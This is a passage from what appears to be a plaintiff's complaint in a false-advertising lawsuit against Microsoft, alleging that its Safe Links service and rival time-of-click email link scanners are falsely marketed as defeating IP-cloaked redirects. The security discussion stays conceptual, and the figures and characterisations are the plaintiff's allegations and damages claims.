Simulated Obfuscators," Tongbo Luo and Xing Jin stated: "In this paper, we tracked and collected over 20000 obfuscated JavaScript samples of 5 exploit kit families from 2014 to 2016. . . Nearly every exploit kit leverages various evasion techniques (e.g. IP cloaking, DGA), which makes consistently sample collecting quite challenging." A true and correct copy of Next Generation Of Exploit Kit Detection By Building Simulated Obfuscators" by Tongbo Luo and Xing Jin is attached hereto as **Exhibit "28."**

96.    In 2015, Microsoft began promoting Safe Links as an effective solution to the central cloud security issue of IP Cloaked forwarding services.

97.    In 2015, security was the number one challenge for convincing consumers to move to the cloud: "Security remains the top adoption challenge . . . ." A summary of 2015 IDG Enterprise Cloud Computing Study posted at https://www.idg.com/tools-for-marketers/2015-cloud-computing-study/ is attached hereto as **Exhibit "29."**

98.    Just two years into Microsoft's marketing campaign, by 2017, consumer perception had completely reversed: "Security concerns have traditionally ranked among the top inhibitors of cloud adoption. But in a striking reversal, security has now become a key reason businesses choose cloud solutions, according to a global survey of more than 500 IT decision-makers. . . ." A summary of 2017 MIT SMR Customer Study posted at https://cloud.withgoogle.com/build/infrastructure/whats-behind-growing-confidence-cloud-security/ is attached hereto as **Exhibit "30."**

99.    Within four years of Microsoft's marketing campaign, by 2019, over 98% of Microsoft's cloud-based customers at least considered the possibility that Microsoft's security "is sufficient" in and of itself. The survey asked decision makers who use Office 365, "Do you think the current security protection for Office 365 is sufficient?" Only 1.96% answered "definitely not."

A true and correct copy of Organizational Security & Compliance Practices in Office 365 is attached hereto as **Exhibit "31."**

100.    The majority of cloud growth from 2015-2019 was driven specifically by the adoption of Microsoft's cloud-based Office 365.  A true and correct copy of Cloud Adoption 2018 War by Bitglass is attached hereto as **Exhibit "32."**

101.    Prior to Microsoft offering its Safe Links service, consumers were safe from IP Cloak forwarding services when they used on-site security. Microsoft knowingly made companies defenseless to this widely-used, highly-effective, stealthy attack in order to procure billions of dollars in sales.

102.    According to Microsoft, it is imperative for Microsoft to be perceived as a leader in security to convince enterprises to purchase its cloud-based apps:  "Microsoft is making tremendous investments in data security and compliance… because they understand that to convince enterprise customers… the company needs to be a leader in security and compliance." **Ex. 31.**

103.    Microsoft's 2018 Q4 Form 10-K confirms that perception of its security is inextricably tied to purchase decisions:

> "**The security of our products and services is important in our customers' decisions to purchase or use our products or services**. . . . If we fail to do these things well, actual or **perceived security vulnerabilities in our products and services**, data corruption issues, or reduced performance **could harm our reputation and lead customers to reduce or delay future purchases of products or subscriptions to services, or to use competing products or services**."

A true and correct copy of Microsoft's 2018 Q4 Form 10-K is attached hereto as **Exhibit "33."** (emphasis added).

104.    Microsoft's own Case Studies regarding its leading partners document that perception of Microsoft's ATP security is an essential element of the purchase decision.  For

example, Microsoft's Partner Profile of Olive + Goose demonstrates that Microsoft's deceptive security messaging is central to *every Office 365 engagement*: "'Every Office 365 engagement that we're a part of has a component of security discussion or deployment and implementation with a customer…' Advanced Threat Protection (ATP) in Office 365 Enterprise E5 offers a compelling customer story." A true and correct copy of the Olive + Goose Case Study is attached hereto as **Exhibit "34."**

105. According to that study, "Olive + Goose is a leading IT solutions company, with a wide base of customers in the US and worldwide."

106. Additionally, Microsoft's "Peters & Associates" Partner Profile documents that Microsoft's ATP security is *selling like hot cakes, number one on their list*:

> Ward highlights Microsoft's Advanced Threat protection (ATP) as one of the key launch points for bundling opportunities. '**ATP is selling like hot cakes, it's number one on our list**,' Ward said. . . . Ward explained that security is one of the key components reshaping their practice. Security sells. . . . As evidence, Ward described the sales cycle for a 2500-seat organization that needed a Cloud Application Security Broker (CASB) to support their work with the insurance industry. Because Microsoft Cloud App Security is deeply integrated into Office 365, Peters & Associates could structure a sale around what Ward calls the "5-5-5 program, involving Office 365 E5, EMS E5, and Windows 10 E5.

A true and correct copy of the Peters & Associates Case Study is attached hereto as **Exhibit "35."**

107. According to that study, "Chicago-based Peters & Associates provides full-service IT consulting, managed IT services, and integrated IT solutions… They have a long record of success as a Microsoft Partner."

108. As both Olive+Goose and Peters & Associates document, Microsoft profits not only from the sale of ATP security itself, but Microsoft's promotion of ATP security is also essential to procuring the majority of sales of Office 365, which is Microsoft's most successful product offering in history.

109. These studies document that consumers are moving to Microsoft's cloud directly due to trusting Microsoft's deceptive promotions regarding the security of Microsoft's ATP security service.

110. In fact, Microsoft's deceptive advertising is causing companies to abandon third party solutions in order to consolidate their security with Microsoft's ATP service - ATP Safe Links specifically:

> While most federal agencies have relied upon dedicated security solutions that require expensive subscriptions and costly hardware, they're finding that agencies are receptive to **Microsoft security solutions as a *fully capable*,** less costly ***alternative***. 'These agencies realize they're spending tens of thousands of dollars a year on security subscriptions, not to mention the hardware costs,' explained Jeff Fowler, Federal Senior Cloud Strategist for Planet Technologies. "If they can get **Advanced Treat Protection (ATP)** and other Office 365 security tools that provide the same functionally **at a lower price point than what they are *paying for their current solutions, they're going to jump* at the opportunity."** . . .

> As Fowler relates, 'IT management at the federal customer wondered, 'Why are we paying for our current bolt-on security product when ***we can get similar functionality from Microsoft built-in*** for just a couple more bucks per user?' **That made the decision to deploy ATP a nobrainer.' Advanced Threat Protection (ATP) is one of the specific reasons the agency decided to *switch*. 'Using ATP, we've enabled Safe Links** across the entire tenant with about 1,000 users now, and Safe Attachments is currently being trialed,' Fowler said.

A true and correct copy of the Planet Technologies Case Study is attached hereto as **Exhibit "36."**

111. According to that study, "Planet Technologies is a successful Microsoft partner with significant experience in cloud and datacenter services, cyber security, and mobile application development…. Planet Technologies is a 6-time Federal Partner of the Year, 6-time State & Local Government Partner of the Year, and 5-time Windows Partner of the Year."

112. The case study above is representative of a current trend of companies getting rid of third-party security in order to *consolidate* by using Microsoft's security alone.

113.    Additionally, Microsoft commissioned a study by Forrester Consulting titled "Total Economic Impact™ Of Microsoft Office 365 Threat Intelligence." This study documents that Microsoft is successfully deceiving companies *en masse* into believing they can swap their third-party security for Microsoft's "end-to-end cyber protection": "*Prior to deploying Office 365 E5 with Threat Intelligence, the interviewed and surveyed customers typically used many disparate third-party solutions to handle email and data file protection*, resulting in complex security environments that were both expensive and difficult to manage… This integrated suite of security products provides a holistic approach to security, *providing end-to-end cyber protection*." A true and correct copy of "The Total Economic Impact™ Of Microsoft Office 365 Threat Intelligence" is attached hereto as **Exhibit "37."**

114.    Microsoft's deceptive message of the full sufficiency of its security offering is deceiving a large number of organizations: "*With the deployment of Office 365 E5, organizations can consolidate their security solutions onto a single platform*, reducing licensing costs expended on a myriad of third-party security solutions." See **Ex. 37.**

115.    The study has the following disclaimer: "This study is commissioned by Microsoft and delivered by Forrester Consulting… Microsoft reviewed and provided feedback to Forrester, but Forrester maintains editorial control over the study… Microsoft provided the customer names for the interviews but did not participate in the interviews." See **Ex. 37.**

116.    As is customary with commissioned consulting reports, the report is only issued upon the approval of the purchaser, Microsoft in this case, making the commissioned report a promotional marketing piece approved by and distributed by Microsoft.

117.    Microsoft's case studies, partner profiles, and commissioned consultancy reports collectively promote the message of abandoning third-party security in order to consolidate into Microsoft's offering alone.

118.    Microsoft's case studies, partner profiles, and commissioned consultancy reports also document Microsoft's success in deceiving consumers *en masse* to consolidate their security with Microsoft's platform – all while Microsoft knows its platform has a "by-design weakness" that allows its security to be bypassed, in its entirety, via IP Cloaking.

119.    Security is a higher priority than compliance: "…security is more prioritized because the effects of security failings are costlier than the effects of compliance failings." (See **Ex. 31**).

**D.      TocMail as Sole Provider.**

120.    By 2011, IP Cloaking had already become the most effective form of evasion, as it thwarts any sort of detection. See **Ex. 1**.  As reported by Rhino Security Labs, IP Cloaking continues to this very day "to bypass known sandbox and threat protection providers" – not just Microsoft's cloud-based security services.  *See* **Ex. 20**.

121.    TocMail's CEO invented a solution and obtained a patent on the first technology that enables a cloud-based redirection service to consistently thwart malicious use of dynamic links (United States Patent No. 10,574,628 ("'628 Patent")). TocMail's CEO assigned all patent rights to Plaintiff.

122.    Prior to Plaintiff's patented technology, no company provided a URL redirect security service capable of thwarting IP-Cloaked dynamic links.

123.    Prior to Plaintiff's patent, every cloud-based URL redirect security service operated as follows:

a.    The security service follows the path of the original URL.

b.    The security service assesses the security of all URLs in the path (often including assessing the content delivered by the final URL).

c.    If no security threats are seen, the security service exits by sending the user's device to the original URL – which can now take them anywhere it wants.

124.    The "by-design weakness" in Microsoft's Safe Links and all other competitors was the last step where the security service exits by sending the user's device to the original URL, which can now take them anywhere it wants.

125.    A service cannot claim to protect consumers from malicious use of dynamic links when that service's final act is to hand control over to the dynamic link itself.  However, this is precisely the situation at hand with Microsoft's Safe Links and all competitors, with the sole exception of Plaintiff.

126.    Plaintiff finally solved the central issue of cloud security (IP Cloaked redirects) by doing the following:

a.    The security service follows the path of the original URL.

b.    The security service assesses the security of the final domain and final URL in the path.

c.    If no security threats are seen, the security service exits by sending the user's device **straight to the final site - bypassing the original URL altogether.**

127.    Only in Plaintiff's technology are users consistently sent to the same site that the security service assesses. With Safe Links and others, the security service might assess a site that is safe, but the user is then sent to a malicious site that the security service never even assessed.

128.    Plaintiff's technology does not have the 'by-design weakness' of handing control back to the original URL, when dynamic redirects are used.

129.    Moreover, Plaintiff's '628 Patent now legally bars its competitors from sending users anywhere other than the original URL. For any company that assesses the final site in a redirect path, Plaintiff's patent requires them to go to the original URL. Since other companies are restricted to going to the original URL, they remain defenseless against the most common cloud hacking attack (until Plaintiff's patent expires).

130.    Thus, Plaintiff is the sole provider of a cloud-based URL redirect security service that thwarts malicious use of dynamic redirects.

131.    There is no need to speculate regarding the number of professionals willing to subscribe to a cloud-based redirect service that offers protection against malicious use of dynamic links, as approximately 100 million have already demonstrated their willingness by purchasing Microsoft's cloud-based service, which was promoted expressly as providing protection against malicious dynamic links.

132.    There is no need to speculate on how many of these professionals would have chosen Microsoft in the absence of false advertising given that no professional would willingly make themselves defenseless against the very attack that they are purchasing protection from.

133.    There is no need to speculate how many professionals would have chosen Plaintiff given that Plaintiff is the sole provider of that which they have demonstrated their willingness to buy.

134.    There is no need to speculate on the amount of money that would be spent by purchasers of Plaintiff's service given that companies already spend billions per year intending to purchase this very service from Microsoft.

135.     IP Cloaking had been the most effective method for bypassing cloud-based security for a decade.

136.     Despite offering the only cloud redirect service that solves this all-important issue, Plaintiff cannot sell its service to those that already expressed billions of dollars of intent on purchasing this service because they wrongly believe they are already getting this service from Microsoft.

137.     Upon information and belief, Microsoft currently has approximately 93,744,000 consumers relying on Safe Links, which was calculated by Microsoft's overall Office 365 user base times the percentage of those users that use Safe Links as documented in the consumer survey co-sponsored by Microsoft.  *See* **Ex. 31**.

138.     Based on Microsoft's growth since the above-referenced report, more than 100 million professionals withhold trade from Plaintiff due to Microsoft's deceptive practices. This represents an annual lost revenue of over $3 billion to Plaintiff ($43 billion over the lifetime of the patent).

139.     The mere cessation of false advertising will not come close to preventing future injury to Plaintiff caused by Microsoft because Microsoft has already convinced these purchasers to trust its security and does not need to continue the false advertising campaign to retain them.

140.     Given that no other company developed a cloud-based redirect service capable of protecting against this common attack *for more than a decade*, and given that Plaintiff's patent restricts all competitors that assess final destinations to sending their users to the original URL, Plaintiff is destined to remain the only provider of a cloud-based redirect service immune to this attack until Plaintiff's patent expires on May 7, 2035. Plaintiff will have suffered damages from Microsoft's false advertising during this entire period, and is therefore seeking just relief.

141.    The sole provider of a product or service is inherently damaged when a competitor capitalizes on consumers' desire to purchase that offering by falsely claiming to provide the same. Likewise, proximate causation of harm inherently exists when a competitor uses false or misleading advertising to influence purchase decisions regarding an offering that a plaintiff alone provides.

## E.    Contributory False Advertising.

142.    Microsoft not only harms Plaintiff through its own false advertising but also harms Plaintiff through contributory false advertising as well.

143.    Multiple third parties offer alternatives to Safe Links to protect Microsoft Office 365 users. Microsoft benefits significantly when consumers choose to subscribe to Microsoft's cloud services out of trust in a third-party's security offering.

144.    Microsoft provides many of these third parties access to its customers' accounts via a proprietary protocol. Such third parties cannot offer their services without Microsoft providing access.

145.    Microsoft also has other technology partnerships and relationships designed to foster adoption of Microsoft cloud apps even when such apps are secured by a third-party. Microsoft benefits greatly from its contributory role in the false advertising of third party security vendors that make Microsoft's cloud apps appear to be safe.

146.    Almost all email cybersecurity vendors participate in a coordinated, industry-wide deception that promotes 'time-of-click' redirection as the solution to links that appear benign to cloud scanners yet send users to somewhere dangerous. The industry further promises that time-of-click security makes cloud computing just as safe (if not safer) than on-premise computing.

This coordinated deceit is the very basis for the rise in cloud adoption, resulting in the vast majority of companies now being effortlessly (and secretly) hacked at will.

147.    The following deceptive advertising from Sophos is emblematic of the industry-wide campaign to convince companies to move to the cloud under the false promise of security: "Simply secure Microsoft Exchange, Office 365, and Google Apps[:] **Shifting your email to the cloud doesn't mean you have to reduce your security.**" See "Sophos Email," which is attached hereto as **Exhibit "38."** (emphasis and punctuation added).

148.    Sophos is advertising its cloud-based email security service. It deceptively claims its time-of-click service protects against email links that attempt to deliver malware only after the email has reached the inbox: "Block Stealth Attacks[:] Protecting employees from malicious website links, our advanced URL protection is out-smarting attackers who slip phishing URLs past traditional gateways - delaying the upload of malware to websites until after the email is delivered. Sophos Time-of-Click checks website reputation before delivery and at the time you click – blocking stealthy, delayed attacks." See a second "Sophos Email," which is attached hereto as **Exhibit "39."** (punctuation added).

149.    Sophos portrays its time-of-click service as "advanced" protection that's "out-smarting attackers" by blocking "stealthy" attacks. However, like all traditional time-of-click redirect services, it is utterly defenseless against the most common method hackers use to delay their exploits: IP Cloaking. Sophos' promotion of its time-of-click protection is false. Alternatively, Sophos' promotion of its time-of-click protection is misleading, confusing and/or deceiving.

150.    Sophos offers its time-of-click protection to Microsoft Office 365 users. Microsoft benefits when Sophos' deceptive advertising convinces companies to subscribe to Microsoft's cloud apps.

151.    Contributory false advertising was the basis of Microsoft's Office 365 initial foothold in cloud computing. In October 2010, Microsoft announced that it was going to launch its cloud-based Office 365. In December 2010, Mimecast proudly announced its accelerated accreditation of becoming a Microsoft Gold Partner in only six weeks, allowing it to integrate tightly with Microsoft's email. General availability of Microsoft Office 365 came in 2011, the same year in which Microsoft's Gold Partner Mimecast promoted cloud security as being *superior* to on-premise: "The cloud isn't just *the most effective place to secure email*, before any threats or intruders ever reach your network; it's also the most efficient. Cloud-based email services can offer *full protection* with the promise of availability and reliability too." A true and correct copy of "Security-as-a-Service: Threat mitigation from the cloud" by Mimecast is attached hereto as **Exhibit "40."** (emphasis added).

152.    Mimecast offers security protection for Microsoft's Office 365 customers: "Mimecast Broad Spectrum Email Security for Office 365: A cloud-based email security layer for Office 365 that reduces risk and combats targeted threats in email." A true and correct copy of "Mimecast Broad Spectrum Email Security for Office 365" is attached hereto as **Exhibit "41."**

153.    Mimecast's protection for Office 365 uses "URL Protect" to address malicious use of dynamic links. Just like Microsoft does for Safe Links, Mimecast also claims that its time-of-click security "ensures" the safety of email links. Mimecast's primary promotional video for its time-of-click service begins as follows: "Mimecast Targeted Threat Protection. URL Protect rewrites all links in inbound emails and **scans destination websites in real time *ensuring***

**malicious websites are blocked** whatever the device or network used." (emphasis added). Mimecast currently displays this video on its primary Targeted Threat Protection promotional webpage: https://www.mimecast.com/products/email-security-with-targeted-threat-protection/.

154.    The video continues on to state that, if the link is deemed to be safe, the user is given access to the original URL. By sending the user to the original URL, Mimecast's URL Protect is utterly defenseless against IP Cloaking - the most common method hackers use to bypass cloud-based security. Thus, it is literally false for Mimecast to claim to *ensure* malicious websites are blocked. In the alternative, it is misleading, confusing and/or deceiving for Mimecast to claim to *ensure* malicious websites are blocked.

155.    Given Mimecast's vulnerability to IP Cloaking, it is also literally false to promise that users' destination websites are scanned in real time. For example, a malicious link that sends Mimecast's scanner to bankofamerica.com (safe site) could then send Mimecast's users to iamhackingyou.com (malicious site). In this all-too-common scenario, the user's destination website (iamhackingyou.com) is not scanned in real time. In fact, it is not scanned at all. Even worse still, Mimecast would not even know that the user went to iamhackingyou.com (malicious site).

156.    It is literally false for Mimecast to promise it "scans destination websites in real time." In the alternative, it is misleading, confusing and/or deceitful for Mimecast to promise it "scans destination websites in real time."

157.    The industry as a whole falsely promotes the following cause/effect relationship: time-of-click redirection makes dynamic links harmless. Cybersecurity vendors make billions of dollars annually by promoting this patently false cause/effect relationship.

158.     For example, it is literally false for Mimecast to promote this cause/effect relationship: scanning of destination websites in real time (the cause) ensures malicious websites are blocked (the effect). The conveyance of this cause/effect is literally false. In the alternative, the conveyance of this cause/effect is misleading, confusing and/or deceptive.

159.     The industry as a whole also promotes the false promise that time-of-click services assess the same destination that the user will visit. As explained above, this is patently untrue. Microsoft not only plays a contributory role in others that promote this message, Microsoft itself also promotes this deceptive (and dangerous) message.

160.     For at least the last year, whenever a person conducted a Google search on 'how Safe Links Works,' the first result from the search was the following Microsoft link: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/how-atp-safe-links-works. In fact, this page is titled "How Office 365 ATP Safe Links works." A true and correct copy of a printout from the link is attached hereto as **Exhibit "42**." The page states: "ATP Safe Links feature immediately checks the URL before opening *the* website. . . . If the URL is determined to be safe, *the* website opens." (emphasis added) Thus, Microsoft unambiguously states that there is one website (*the* website). However, when it comes to the most-commonly used cloud hacking attack, this is not true. The scanner goes to one website while the user goes to a very different website. Microsoft's language falsely conveys that the scanner will assess the same website that the user will visit - *the* website.

161.     One of the most popular cybersecurity vendors is Symantec. Symantec also sells a time-of-click security service for Microsoft Office 365 users. Symantec promotes its service as follows: "*Click-Time URL Protection* blocks malicious links by analyzing them when they are clicked by end-users to *protect against spear phishing attacks that weaponize a link after an email*

*is delivered…* Unlike other solutions that rely on reactive blacklists or signatures to stop spear phishing attacks, Symantec proactively stops both new and known spear phishing attacks that employ malicious links by performing deep evaluation of links in real-time. *This deep evaluation follows links to their final destination…*" See "Symantec Email Threat Detection and Response" Data Sheet, attached hereto as **Exhibit "43."**

162.     As with the other vendors offering protection for Microsoft cloud users, Symantec promotes the same false cause/effect relationship: time-of-click security (the cause) stops links that only lead to malicious content after delivery (the effect). However, any time-of-click service that hands control over to the original URL remains defenseless against IP cloaking; not one bit better than having no time-of-click security at all. There simply is not any cause/effect relationship. Symantec's promotion of this cause/effect is literally false. In the alternative, Symantec's promotion of this cause/effect is misleading, confusing and/or deceitful.

163.     Symantec also promises that "deep evaluation follows links to their destination" - conveying that the deeply evaluated destination is the same destination that the user will visit. But when it comes to the most commonly used cloud-based hacking attack, this simply is not true. To promote the idea that Symantec will deeply evaluate the same destination that the user will visit is false. In the alternative, to further promote the idea that Symantec will deeply evaluate the same destination that the user will visit is misleading, confusing and/or deceptive.

164.     Just like Microsoft and Mimecast, Symantec claims that time-of-click security *guarantees* (ensures) that users only go to safe sites: "The Click-time URL Protection service 'rewrites' and performs checks on URLs in emails that are delivered to your organization's end users. The process of rewriting allows the service to manage access to the URL to ***ensure* the destination is innocuous**. Any URL that is rewritten by Click-time URL Protection is checked

every time an end-user clicks on it, to **ensure the URL destination is not hosting malware, phishing, or spam threats**." See Symantec's "Product Updates Symantec Email Security.cloud," attached hereto as **Exhibit "44."** (emphasis added).

165. All three vendors promote a service that is utterly defenseless against the most-commonly used cloud hacking attack while *guaranteeing* safety against this very attack. When Microsoft users hear Microsoft promoting the same false message as other leading cybersecurity vendors, they naturally conclude that the popular security vendors are telling them the truth (and that Plaintiff's startup company must be in error). The damage being done to Plaintiff's reputation is incalculable.

166. Proofpoint is a cybersecurity vendor that once strongly warned companies about the danger of IP Cloaked forwarding services in 2014. (See **Ex. 22**.) ProofPoint's warning was quite extensive, including a thorough analysis into how the services work, why they are so dangerous, and the identity of the major players. Today, Proofpoint offers its "URL Defense" service to address the issue of malicious dynamic links.

167. Proofpoint states that its URL Defense service operates as follows: "URL Defense protects organizations from accessing known malicious sites by locating and replacing URLs found within the message body with a separate URL. If users click on a known malicious URL instead of being directed to *the original URL* they are instead directed to a page informing that the site is not safe and been blocked." A true and correct copy of the Proofpoint Essentials Administrator Guide is attached hereto as **Exhibit "45."** (emphasis added).

168. Because Proofpoint hands control over to "the original URL," it has the same by-design weakness as Microsoft's Safe Links, making it equally defenseless against IP Cloaking.

169.    Even though Proofpoint's URL Defense is bypassed by the most-commonly-used evasion technique and even though Proofpoint demonstrated its expertise regarding IP Cloaking (in its 2014 report), Proofpoint nevertheless promotes its URL Defense as "the only service that effectively detects, catches and analyzes malicious URLs targeting this market." A true and correct copy of the "Proofpoint Essentials URL Defense" is attached hereto as **Exhibit "46."**

170.    Proofpoint's promotional message above is false.  Alternatively, at a very minimum, it is misleading, confusing and/or deceiving.

171.    Proofpoint offers its URL Defense as an alternative to Safe Links for Microsoft's Office 365 users: "Proofpoint Provides Complete Protection for your Office 365 Deployment: Provides complete protection against advanced threats with URL Defense Service and Attachment Defense Service."  A true and correct copy of the Proofpoint's "Microsoft Office 365 and Proofpoint" Essentials Administrator Guide is attached hereto as **Exhibit "47."**

172.    Proofpoint has ceased warning customers about IP Cloaked forwarding services, and instead promotes an offering that is literally defenseless against these services, all while promising effective protection nonetheless.  This is all to the benefit of Microsoft, the largest cloud-based Software as a Service (SaaS) provider.

173.    As shown above: Microsoft, Mimecast, and Symantec promote time-of-click redirection as "ensuring" (guaranteeing) safety for Office 365 users. Barracuda is another popular cybersecurity vendor that promotes time-of-click redirection as an absolute panacea for Microsoft Office 365 users: "Link protection redirects suspicious and typosquatted URLs so malware is *never* inadvertently downloaded by recipients." See "Barracuda Essentials for Email Security," which is attached hereto as **Exhibit "48."** (emphasis added). This specific and exact statement of absolute protection is repeated verbatim by multiple Barracuda resellers - specifically when promoting

Barracuda Essentials specifically for Microsoft's Office 365. Such resellers include: Alliance Business Technologies (https://www.abtechnologies.com.au/barracuda-essentials/), Acordis Technology and Solutions (http://www.acordiscorp.com/barracuda-essentials.html), BarraGuard (https://www.barraguard.com.au/Essentials-Office-365.asp), IT Bus Limited (https://it-b.co.uk/products/essentials-for-office-365/), and OneHQ IT (https://www.fission.co.nz/barracuda-essentials/), and more.

174. Once again, Microsoft benefits from its cloud users being assured that time-of-click redirection guarantees that they will never download malware from a protected link. Such guarantee is false. In the alternative, such a guarantee is misleading, confusing and/or deceptive. Yet such absolute guarantees are highly effective in lulling hundreds of millions of consumers into a false sense of safety, to the degree that they confidently purchase Microsoft's cloud-based apps and services.

175. There are hundreds of millions of hacking attacks, and email security promotional materials are typically short. Thus, it is very telling that Microsoft, Mimecast, Sophos, Barracuda, Symantec and ProofPoint all discuss email links that initially appear to be benign only to lead somewhere malicious after delivery. In fact, Microsoft even openly acknowledges that such emails evade the entirety of its $1 billion per year detection infrastructure. Out of the hundreds of millions of attacks, they all discuss this specific one because promising a solution to this problem is *essential* for convincing companies to purchase cloud-based apps and services. It is material to the purchase decision.

176. As an example, Vade Secure correctly points out security at the time of click is "the most critical step": "With Vade Secure's Anti-Phishing solution, **your users are protected at the**

**most critical step: at the time-of-click**." See "Anti-Phishing Solution: The Real Time Protection," which is attached hereto as **Exhibit "49."** (emphasis in original).

177.    Vade Secure is a cybersecurity vendor that currently protects over 600 million email accounts. It also uses Microsoft's proprietary protocol to integrate with Office 365 user accounts. Hence, Microsoft directly enables Vade's offering.

178.    On June 14, 2019, Plaintiff's current CEO sent an email to Vade Secure to see if it too sends users to the original URL just like Microsoft Safe Links does and asked specifically: "What is the advantage of your 'time of click' phishing security vs Microsoft's 'time of click' safe links?"

179.    On June 14, 2019, Olivier Saoletti of Vade Secure's Support team responded: "The main difference about "Time Of Click" for Vade Secure and Safe link is that we are using our own databases of malicious URLs. These databases are updated every minute. So you you don't have to create some rules and enter manually some urls to be protected. You can have a look at our website : https://www.vadesecure.com/en/solutions/anti-phishing-2/ And also you can check our antiphishing dedicated website : http://www.isitphishing.org." A true and correct copy of the email chain with Vade Secure is attached hereto as **Exhibit "50."**

180.    Given that Microsoft and the rest of the industry passes control to the original URL, if Vade Secure were sending users to a different URL they would have gladly volunteered this revolutionary difference (just as Plaintiff's patented method is a revolutionary difference). However, Olivier Saoletti's response strongly conveys that Vade Secure also sends users to the original URL; thereby being defenseless against IP Cloaking like the rest of the time-of-click industry.

181.    Although going to the original URL renders Vade Secure defenseless against IP Cloaking, Vade Secure, who services over 600 email addresses, nevertheless promises that time of click "ensures" safety: "All URLs must be reexamined in real time **to *ensure* that the sites continue to be legitimate, and that they don't redirect to phishing or other types of malevolent sites**." (https://www.vadesecure.com/en/how-can-machine-learning-block-multi-form-attacks/). (emphasis added).

182.    The combined impact of all the companies listed in this section affects the perception of approximately 1 billion consumers: Vade Secure protects over 600 million email addresses; Symantec is one of the most popular cybersecurity vendors; Microsoft Safe Links protects approximately 100 million users; and all the other vendors also service numerous mid to large size users.

183.    The third parties' false and misleading advertising identified in detail herein is significant for several reasons. First, it elucidates Microsoft's role in contributory false advertising. Second, it provides the essential context in which Microsoft's own advertising is being received and interpreted. Third, it documents the extreme importance of the issue of malicious dynamic links in regards to purchase decisions - so much so that every email security vendor chooses to discuss it (out of the hundreds of millions of other attacks). Fourth, it documents that all of the leading time-of-click redirection providers share the same design flaw (of going to the original URL), making Plaintiff the sole provider of a time-of-click redirection service that actually solves the extremely important issue of malicious dynamic links. Finally, it documents that the approximately 1 billion consumers who have already expressed their desire to purchase that which Plaintiff alone offers are diverted elsewhere through a coordinated false advertising campaign, resulting in extreme damage to Plaintiff's business and reputation.

184.    Microsoft continues to supply its service to those it knows or has reason to know are engaged in false advertising directly in regards to the service being supplied.  As a result, Plaintiff has been damaged by Microsoft's contributory false advertising.

185.    Through its own false advertising combined with contributory false advertising, Microsoft causes approximately 1 billion professionals to withhold their trade from Plaintiff.

186.    All conditions precedent to the filing of this action have been fulfilled or waived.

187.    Plaintiff has retained the undersigned counsel to represent it in this action and is obligated to pay undersigned counsel's reasonable attorneys' fees, which fees, together with costs, Plaintiff is entitled to recover from the Microsoft pursuant to at least 15 U.S.C. § 1117.

## COUNT I
### False and Misleading Advertising under 15 U.S.C. § 1125(a)(1)(B)

188.    Plaintiff re-alleges and re-avers paragraphs 1-187 as though fully set forth herein.

189.    This is an action for false and misleading advertising under the Lanham Act, 15 U.S.C. § 1125(a)(1)(B).

190.    Microsoft has misrepresented the nature, characteristics and/or qualities of its ATP Safe Links service in commercial advertising and/or promotion resulting in Plaintiff being damaged and/or likely to be damaged by such acts.  Microsoft continues to misrepresent the nature, characteristics and/or qualities of its ATP Safe Links service in commercial advertising and/or promotion resulting in Plaintiff being damaged and/or likely to be damaged by such act.

191.    More specifically, Microsoft's misrepresentations are in regards to the safety of its ATP Safe Links service as described in significant detail above.  A claim that a seller falsely represents the safety of its product or service is a traditional claim of consumer misrepresentation.

192.    As discussed at length above, Microsoft has made statements of fact in commercial promotion, advertising and marketing that are literally false.  Alternatively, at a very minimum,

Microsoft has made statements of fact in commercial promotion, advertising and marketing that are misleading, confusing and/or deceiving. All such statements of fact are found in, among other things, Microsoft's *primary* promotional materials, including but not limited to:

      i.      the official 2015 EOP ATP Product Guide

      ii.     the official 2019 ATP Product Guide

      iii.    the primary promotional webpage for ATP

      iv.    the PowerPoint presentations designed to be given to key decision makers

      v.     approved promotional materials to be used by Microsoft Partners

193.    Microsoft's actions deceive or have a tendency to deceive the target audience, including consumers and purchasers of its cloud services, and may influence and/or have influenced consumers to refrain from purchasing Plaintiff's service. Additionally, such actions may influence and/or have influenced consumers to purchase Microsoft's service rather than Plaintiff's service. No evidence of deception is required for literally false statements. For misleading, confusing and/or deceiving statements, consumer surveys, market research and other evidence demonstrate that Microsoft's statements are misleading, confusing and/or deceiving.

194.    As a result, Microsoft's actions have had and continue to have a material effect on purchase decisions. Among other things, consumer surveys, market research, and case studies discussed above document that Microsoft's deceptive misrepresentations regarding its ATP security had a material effect on purchase decisions not only for the ATP security service itself, but also for Defendant's Office 365. Additionally, Microsoft's 2018 4Q 10K Report also documents that perceptions regarding security have a material effect on purchase decisions. *See* **Ex. 33**.

195.    Microsoft has used the subject promotional and advertising materials presented herein to deceptively market its ATP service to millions of consumers in all fifty states, across state lines.  Thus, Microsoft's deceptive advertising and promotion affects interstate commerce.

196.    Plaintiff is a competitor of Microsoft and has suffered injury to a commercial interest in sales or business reputation proximately caused by Microsoft's misrepresentations. Among other things, Plaintiff has been injured by Microsoft's false and misleading advertising by consumers withholding trade from Plaintiff, presently and in the future due to trusting Microsoft's false advertising.  In the alternative, Plaintiff is likely to be injured by Microsoft's false advertising by consumers withholding trade from Plaintiff due to trusting Microsoft's false advertising.

197.    Additionally, Plaintiff's business reputation has been injured by Microsoft's false and misleading advertising due to consumers believing that Plaintiff offers nothing of value to them due to their trusting Microsoft's false claims to already be providing the service that Plaintiff provides.  Specifically, Plaintiff is the sole provider of that which Microsoft falsely claims to offer, making every dollar gained by Microsoft trade that is being withheld from Plaintiff.

198.    Microsoft has deceptively convinced roughly 100 million users to purchase protection from links that appear to be benign, only to change destination when clicked. This deception causes these 100 million professionals to withhold trade from Plaintiff. These professionals also wrongly perceive Plaintiff's security offering as holding no value to them, which irreparably harms Plaintiff's commercial interest and business reputation.  Although Plaintiff has solved the single biggest issue in cloud security, Microsoft's misrepresentations have caused it to appear as if Plaintiff claims only to have solved a non-existent problem.

199.    The withholding of trade of 100 million professionals results in more than $43 billion in lost profits over the lifetime of Plaintiff's '628 Patent.  The mere cessation of false

advertising by Microsoft will not prevent future injury to Plaintiff because Microsoft has already convinced purchasers to trust its security and does not need to continue the false advertising campaign to retain them.  Thus, Plaintiff is seeking in excess of $43 billion in damages.  Such damages are in addition to the injury to Plaintiff's business reputation.

